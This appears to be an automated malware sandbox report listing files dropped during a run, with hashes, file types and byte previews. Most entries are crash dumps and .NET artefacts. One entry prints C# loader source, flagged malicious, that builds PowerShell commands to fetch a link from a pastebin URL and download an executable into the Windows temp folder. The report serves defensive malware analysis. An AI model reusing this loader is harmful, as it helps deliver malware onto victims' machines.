                                                                                                                                                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.3.6.0.4.3.2.4.7.5.5.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.3.6.0.4.3.9.8.1.9.1.8.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.4.e.e.e.5.1.1.-.b.8.2.3.-.4.a.9.9.-.9.f.b.c.-.9.d.e.8.1.4.9.7.6.e.c.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.f.d.5.5.7.6.-.d.0.a.a.-.4.3.6.4.-.b.0.1.1.-.6.6.8.2.9.6.5.8.7.6.3.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.z.b.j.n.k.z.v.o.4.c.c...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.u.b.y.L.i.a.m.V.i.o.l.e.t...z.Y.O.f.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.4.c.-.0.0.0.1.-.0.0.1.4.-.e.e.8.7.-.0.1.7.5.9.d.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.c.a.e.a.a.9.d.7.5.a.f.4.5.5.5.e.c.c.6.3.6.7.d.d.3.2.c.d.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Sat Nov 23 11:47:23 2024, 0x1205a4 type
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):198734
                                                                                                                                                          Entropy (8bit):3.3252500745580025
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:iEMKsGdM0gfqNquj9pN4uE2aOufuqLTgCp1MfAcDCDfP4m:itZ/fqNqujx4uEqxqLTg+W2I
                                                                                                                                                          MD5:8132F621FE49FE315DD339A918CD9226
                                                                                                                                                          SHA1:93E49C2C4E2BB2F35A9A942C3BBA83D96A3BE3AA
                                                                                                                                                          SHA-256:D9551F8723424AF083B5E45C7EDAD161BC6791FEFAA548EF8864FCCD627740FD
                                                                                                                                                          SHA-512:B230DCA6ED69ECD70DA4458DF1673B7513A769C65F0A03317BEE55EA2191EEE933711D56CCC3DBF6AEDA11B28406CBC4ACFA87D7C62C50C30D28A26A8AFD86F4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MDMP..a..... .........Ag............D...............X.......$................J..........`.......8...........T............0..............,............ ..............................................................................eJ....... ......GenuineIntel............T.......L.....Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8410
                                                                                                                                                          Entropy (8bit):3.704347591006382
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:R6l7wVeJ6T65JZe6Yle6sWgmfZKYiprt89b9lsfLmfm:R6lXJO6A6YM6sWgmfgYd9+fLf
                                                                                                                                                          MD5:AA1134CD956E18B4A6778921BA5AC785
                                                                                                                                                          SHA1:1F8A00AAD6908190318050D42F75D962D8213F4F
                                                                                                                                                          SHA-256:915AAC8A660A66DBEBFF575FED4047CC16B29D5726299CC7793678CC8216385E
                                                                                                                                                          SHA-512:CE57C497FC9D13BC8E34FD0E72A002212C316704FFB241ED1852D243821E98E70AF489FC3AD1734C5616DB85C2F540B208B03235700385BB3FE85E42E66C9002
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.1.2.<./.P.i.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4787
                                                                                                                                                          Entropy (8bit):4.530851756835796
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:cvIwWl8zsDJg77aI9t6WpW8VYeYm8M4Jx2FLH+q8v/9ZyN7ZH2Gd:uIjfdI7r77VKJCK1Z+H2Gd
                                                                                                                                                          MD5:936F0D70B31862BB4B4B17B082488BC9
                                                                                                                                                          SHA1:CEE67F0856055841EB42632C87EB978CD28BB362
                                                                                                                                                          SHA-256:22FAFBED849F1399BFB94A25A94B348FA504975E038EDBD79CFB0872B3FEE837
                                                                                                                                                          SHA-512:BE72C161A23B5885E77609226762F0CF4732206076D8A1865F1FF57FF4795D5B91928E63F9F4D98CFAD0C8CE41C62FE381D5B19F7D2EC109BDFF512CD6D8B151
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600650" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:Mini DuMP crash report, 15 streams, Sat Nov 23 11:47:25 2024, 0x1205a4 type
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):191975
                                                                                                                                                          Entropy (8bit):3.2752399287933547
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:YlTJJzrxGpN4uE2aOSLgNxShiLTgw0KR88SCD5Iq9TO+UNU:MLlQ4uEq37bLTgwzegLdO+
                                                                                                                                                          MD5:B509FF4AAB8A3C654C1C7E8A37B73B84
                                                                                                                                                          SHA1:4D6C484126564494E7007C2D215F5E7365CCCCC1
                                                                                                                                                          SHA-256:95D4CB82A6D1273011C5188C00C2F26CE0CC0A048ECBE79B15AC3EA0B46B8DD4
                                                                                                                                                          SHA-512:494FF1F6F3D5119EFF91FC2B4A2D8A0AFDE1BC9230ABB00F56C760400D19975B5544CA9C42E8C435C7B387DE04675E4D1AF78F4FD9F94AB6588FC7212239343D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:MDMP..a..... .........Ag............D...........l...X.......$...........D...^I..........`.......8...........T............/../.......................................................................................................eJ......l.......GenuineIntel............T.............Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8396
                                                                                                                                                          Entropy (8bit):3.692543800521999
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:R6l7wVeJvlwM62216YTM6TgmfZtlviprM89bLhsf55m:R6lXJvZ6N6Y46TgmfztOLaf2
                                                                                                                                                          MD5:88608F2EB4EECE27A6564C36F0AED49E
                                                                                                                                                          SHA1:D0C09C9CD5AB23F9024F8FC63E6A4E18FFD9F4DB
                                                                                                                                                          SHA-256:8346C25197CA519F80DC9C0A1BC1F4C2B56C88B8A326E9E737DB3F88CB3D35C4
                                                                                                                                                          SHA-512:CEB60BB69FE081A8A9ED0D3EF5BA890C70E6129B3D6569E3EB2FD8D9CF7CB38354FC11B8335065E9D32C1F864976A03D1F507F2B88053D0A036045FA05BB25F4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.5.6.<./.P.i.
                                                                                                                                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4775
                                                                                                                                                          Entropy (8bit):4.470307137645526
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:cvIwWl8zsDJg77aI9t6WpW8VYxYm8M4JTDpDuFe+q8vxpDzyN7NHPHPd:uIjfdI7r77VBJTDDKxh2HPHPd
                                                                                                                                                          MD5:6557F405291114509F8461D58A5CA554
                                                                                                                                                          SHA1:D0A1DB78D014C9C1AFD87ECED992D72EAE4B258E
                                                                                                                                                          SHA-256:4D083FCC4CFDFF856805C2F313953763B2E8A12BD0BDDDBE0BD855ECB129DBE7
                                                                                                                                                          SHA-512:BB66ACC9345C11ABCD5B2E73E178D96E75F82974D51E74BCE2EB6C8646A9C62968066C6218A4D4C4F78EB85DFD649D08AE9C4B9B885B468A07B8C21F952A3372
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600650" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          File Type:CSV text
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):425
                                                                                                                                                          Entropy (8bit):5.353683843266035
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                                                                                                          MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                                                                                                          SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                                                                                                          SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                                                                                                          SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1596
                                                                                                                                                          Entropy (8bit):5.620109153867816
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:MlaSU4y4RQmFoUeWmfmZ9tK8N/+HueOjlZS5G5Nz:MNHyIFKL3OZ2K/+nOZZ4ENz
                                                                                                                                                          MD5:16980511050932433E0043497191FD2C
                                                                                                                                                          SHA1:A187FFC9F7C3A10065D444201B2233ADA6AD58F8
                                                                                                                                                          SHA-256:CF9179BE774B175198063FA7116BFF7726A2666115067E00959C1E6E944BE2B9
                                                                                                                                                          SHA-512:F188DE2804286A18BE7D402219F8EAD933D31333E6F500AFC672ABA0F94E66042EE47824DA7E3B5D2AE1DB25A1C504A5AB7C3B7457943E3AB87EB3B812435F0A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:@...e...........d....................................@..........@...............M6.]..O....PI.&!.......System.Web.Extensions...H...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...
                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):3608
                                                                                                                                                          Entropy (8bit):4.674309527372753
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:JoOUVpkXLZArHN58uJlPmqDXz9dkLMqF/E:qpk7QlRDXppEM
                                                                                                                                                          MD5:9328E9B30EB919743B2E9739999335C3
                                                                                                                                                          SHA1:E6CE274A36E5F78A2F46A6B92F534755E3938261
                                                                                                                                                          SHA-256:3720A26EE04FADC5ECDC14C9FBF7A1C75AEA6F58029E1F6879CE9CAB8A0FAAB7
                                                                                                                                                          SHA-512:79707E84492961B29C44F820F137E9D607F0DE5392C052018E79541754D412F5B798ADE0A6C621E17D7747FD385F913EAE4B077986612F984B31885E6919B87E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_PowershellDownloadAndExecute, Description: Yara detected Powershell download and execute, Source: C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs, Author: Joe Security
                                                                                                                                                          Preview:.using System;..using System.Diagnostics;..using System.IO;..using System.Threading;....public class HomeP..{.. public static void GetLoader(string pastebinUrl).. {.. string tempExePath = Path.Combine("C:\\Windows\\Temp", Path.GetRandomFileName().Replace(".", "") + ".exe");.... string psCommandGetLink = "(New-Object System.Net.WebClient).DownloadString('" + pastebinUrl + "')";.... string psCommandDownloadExe = "(New-Object System.Net.WebClient).DownloadFile(" + psCommandGetLink + ", '" + tempExePath + "')";.... using (Process powerShell = new Process()).. {.. powerShell.StartInfo.FileName = "powershell";.. powerShell.StartInfo.Arguments = "-Command \"" + psCommandGetLink + "; " + psCommandDownloadExe + "\"";.. powerShell.StartInfo.RedirectStandardOutput = true;.. powerShell.StartInfo.RedirectStandardError = true;.. powerShell.StartInfo.UseShellExecute = false;.. powerShell.Start
                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):183
                                                                                                                                                          Entropy (8bit):5.074814871758469
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:0HXEXA8F+H2R5BJ1Rt+kiE2J5xAIhOJXop1FaiQCIFRVRMxTPIt+kiE2J5xAIhO6:pAu+H2Lnwkn23fhsXs10zxszIwkn23f7
                                                                                                                                                          MD5:3B1A6704A23BB004480C4AF5504357D3
                                                                                                                                                          SHA1:5E55BF2C05E347FC912857B5A8F543D7835A26E7
                                                                                                                                                          SHA-256:89A69DB4C4872FEFA9804C47DE82A374932BA7D75959A0CB5DC44A0E40CCBCF5
                                                                                                                                                          SHA-512:B65BE4B24E45FF5374138DDF201C5C6570D77B366B1C9D3D0805238C3586ABCA60BA7CF9463BC1536C31DB8DA95F5A5408ED6E9AECA66FF5864BDDD1B54D5C86
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:./t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs"
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):6144
                                                                                                                                                          Entropy (8bit):3.812263006288113
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:xBvCxpv5oxxZzaigvVU5791c4VFekkhB69K:XvCxpGxPzai9W2EX
                                                                                                                                                          MD5:E5720AE73F41937EF995036A71B38B48
                                                                                                                                                          SHA1:E7F262D19305CF91B7CAF68A7A4251172C3ABDAD
                                                                                                                                                          SHA-256:CECC8637967E2E86C78A2DE341CDFB27F5108EB76FDDE57087071130708EB0C7
                                                                                                                                                          SHA-512:EA28BDBCDB9F0F70A0506A62BA62BFF8763EC02EAC649DAF0E1A470BCB57963F67217DB6F004DEE42BC55F71255C87FDCCD494B815AB1EA3C4443F90531FD082
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag...........!..................... ...@....... ....................................@..................................-..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B........................H........#..,............................................................0..M.......r...p(....r!..pr%..po....r'..p(....(.....r1..p.r...p(................r...p.........r...p.........r...p...(.....s......o....r...po.....o...............r...p.........r1..p.........r7..p...(....o.....o.....o.....o.....o.....o.....o.....o.....o.....o.....o.....o....&.o.......,..o.....s.........o.......o.......o.......o......(....o....*.........u..........0..........r;..p(....o.....r...p(....o.....
                                                                                                                                                          Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                                                                                                                                          Category:modified
                                                                                                                                                          Size (bytes):681
                                                                                                                                                          Entropy (8bit):5.249749424539672
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:KJN/qR37LwfpsXsqQfpsXs2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBqdYfxfyKax5DqBVKVrdFAMBJTH
                                                                                                                                                          MD5:8DE6A24B27C9B1EF40399591A6C7FF19
                                                                                                                                                          SHA1:90B145042FA55407B88DC13B36A1C6516166B262
                                                                                                                                                          SHA-256:D703329FFF07D26ECC2E398D7EBAC4AC790F3E4E7214CBA3BEDE2154D3E31073
                                                                                                                                                          SHA-512:150708EFE5957F82DF39369EC099E86835E776F61BF0BAAAF82E6FBBDD26B8FD6E0DC1689A2FDFF49466341D21A16AD2E802883B1971F012A0C3F45B8D0C478F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /out:"C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\1ixib5wl\1ixib5wl.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                          File Type:MSVC .res
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):652
                                                                                                                                                          Entropy (8bit):3.1040925935485912
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytak7YnqqhPN5Dlq5J:+RI+ycuZhN/akShPNnqX
                                                                                                                                                          MD5:DE23DFA76DCC0E8BF7EDA7665911510C
                                                                                                                                                          SHA1:3B9C599F15D84DB767A6E42E987D07B06D1DF0DE
                                                                                                                                                          SHA-256:E66761D638E2BAB240DA5919DA713E375C9DD5D288F746298E7E1CDE16F1945D
                                                                                                                                                          SHA-512:91C51A5B0C83C32AEECE8812AD352691E265D5DAF450C8F48832CABCA1D12CAACC37EC278B5D1F2F9B2F7581F3E48A93D59ED407490CC400C542204F7EB7E1D7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.i.x.i.b.5.w.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.i.x.i.b.5.w.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Sat Nov 23 13:09:39 2024, 1st section name ".debug$S"
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1328
                                                                                                                                                          Entropy (8bit):3.9868602356341087
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:HQMe9ERhfGbk7XDfHrWwKEbsmfII+ycuZhN/akShPNnqSqd:ZCk7zBKPmg1ul/a3TqSK
                                                                                                                                                          MD5:23A2E637DCF4073EE7DF70D2D19573BF
                                                                                                                                                          SHA1:5F76260594CD48384E523F4BA1277EF3B4D6BA93
                                                                                                                                                          SHA-256:1C5DE2F4E4A0BB9F7B577A7C4A6D92FAB2684AB9681C35E9DDD7585A0BD8B3FB
                                                                                                                                                          SHA-512:A73B36EBD5D9C76E0FC577CC216E8C2A2DC2544F0CEBFD74B466F9B00B106E2DB4731F9A91345422C08CCCE59F86C614E4E9DDA4459ACA9B3CE65C49B35AD120
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:L.....Ag.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\1ixib5wl\CSC291E15774B6A482B9669CEACC9B56C.TMP..................#.m.....fY.Q...........4.......C:\Users\user\AppData\Local\Temp\RES42BA.tmp.-.<....................a..Microsoft (R) CVTRES.\.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.i.x.i.b.5.w.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                          File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Sat Nov 23 13:09:42 2024, 1st section name ".debug$S"
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1328
                                                                                                                                                          Entropy (8bit):3.990592659183095
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:H17ge9E2+ftirq1YmXDfHlwKEbsmfII+ycuZhN7HOakSiHPPNnqSqd:UtjCmzmKPmg1ul7HOa3iHNqSK
                                                                                                                                                          MD5:48CF49DD49E52E861F30F0F8F3AC7F56
                                                                                                                                                          SHA1:F6F88E94342F69BB03B92ABE2201EE6140BCD09D
                                                                                                                                                          SHA-256:A58831A0D3DDC59DBBC9F6C9DEFE4429ACC514EFC7F1A1FB98D4E175C63E8224
